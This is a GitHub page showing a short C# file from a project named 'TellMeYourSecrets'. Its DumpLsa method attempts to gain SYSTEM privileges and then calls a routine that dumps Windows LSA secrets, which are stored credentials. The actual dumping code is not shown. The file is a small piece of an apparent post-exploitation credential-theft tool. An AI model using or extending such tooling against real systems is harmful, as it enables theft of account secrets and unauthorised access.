-
Notifications
You must be signed in to change notification settings - Fork 18
Expand file tree
/
Copy pathClass1.cs
More file actions
25 lines (24 loc) · 704 Bytes
/
Class1.cs
File metadata and controls
25 lines (24 loc) · 704 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace TellMeYourSecrets
{
public class LSA
{
public static String DumpLsa()
{
StringBuilder output = new StringBuilder();
CheckPrivileges checkSystem = new CheckPrivileges();
String results = "";
if (checkSystem.GetSystem())
{
LSASecrets lsaSecrets = new LSASecrets();
lsaSecrets.DumpLSASecrets();
results = lsaSecrets.GetOutput();
}
output.Append("\n" + checkSystem.GetOutput() + "\n" + results);
return output.ToString();
}
}
}